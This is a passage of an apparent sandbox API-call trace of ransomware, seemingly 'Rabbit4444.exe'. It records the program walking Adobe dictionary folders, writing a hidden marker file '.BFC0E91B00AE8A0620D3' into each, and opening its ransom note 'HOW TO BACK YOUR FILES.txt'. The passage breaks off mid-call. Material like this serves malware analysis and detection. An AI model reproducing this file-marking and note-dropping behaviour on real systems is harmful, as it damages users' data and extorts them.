lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\" [0054.431] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\.BFC0E91B00AE8A0620D3" [0054.431] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\en_us\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.432] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.434] FlushFileBuffers (hFile=0x27c) returned 1 [0054.435] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.435] CloseHandle (hObject=0x27c) returned 1 [0054.436] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US") returned 97 [0054.436] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5e98a62e, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e98a62e, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0054.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.436] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.436] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.436] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.436] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5e98a62e, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e98a62e, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.436] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.436] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.436] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.436] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c3ecff, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c3ecff, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.436] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c3ecff, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c3ecff, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c3ecff, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.436] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0054.437] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.437] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_US\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\en_us\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.438] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.438] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.438] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.438] CloseHandle (hObject=0x278) returned 1 [0054.438] CloseHandle (hObject=0x27c) returned 1 [0054.438] GetCurrentThreadId () returned 0xd98 [0054.438] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0054.438] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB" [0054.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116380 | out: hHeap=0xe0000) returned 1 [0054.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0054.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB" [0054.438] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\" [0054.438] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\.BFC0E91B00AE8A0620D3" [0054.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\en_gb\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.439] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.442] FlushFileBuffers (hFile=0x27c) returned 1 [0054.443] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.443] CloseHandle (hObject=0x27c) returned 1 [0054.444] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB") returned 97 [0054.444] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.444] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5e074d37, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e074d37, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c64f92, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0054.444] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.444] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.444] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.444] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.444] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5e074d37, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e074d37, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c64f92, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.444] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.444] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.444] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.444] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.444] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.444] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c64f92, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c64f92, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c64f92, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.444] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.444] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.444] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c64f92, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c64f92, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c64f92, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.444] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0054.444] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_GB\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\en_gb\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.445] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.449] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.449] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.449] CloseHandle (hObject=0x278) returned 1 [0054.449] CloseHandle (hObject=0x27c) returned 1 [0054.449] GetCurrentThreadId () returned 0xd98 [0054.450] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0054.450] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA" [0054.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1165f0 | out: hHeap=0xe0000) returned 1 [0054.450] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0054.450] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA" [0054.450] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\" [0054.450] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\.BFC0E91B00AE8A0620D3" [0054.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\en_ca\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.452] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.455] FlushFileBuffers (hFile=0x27c) returned 1 [0054.458] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.459] CloseHandle (hObject=0x27c) returned 1 [0054.459] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA") returned 97 [0054.459] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.459] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2ba77, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ad2ba77, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c64f92, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0054.459] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.459] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.459] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.459] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.459] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2ba77, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ad2ba77, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c64f92, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.459] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.459] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.460] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.460] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.460] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.460] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c64f92, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c64f92, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c8b19b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.460] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.460] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.460] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c64f92, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c64f92, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c8b19b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.460] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0054.460] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.460] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\en_CA\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\en_ca\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.460] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.460] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.461] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.461] CloseHandle (hObject=0x278) returned 1 [0054.461] CloseHandle (hObject=0x27c) returned 1 [0054.461] GetCurrentThreadId () returned 0xd98 [0054.461] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0054.461] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE" [0054.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0054.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0054.461] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE" [0054.461] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\" [0054.461] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\.BFC0E91B00AE8A0620D3" [0054.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\de_de\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.462] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.465] FlushFileBuffers (hFile=0x27c) returned 1 [0054.466] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.466] CloseHandle (hObject=0x27c) returned 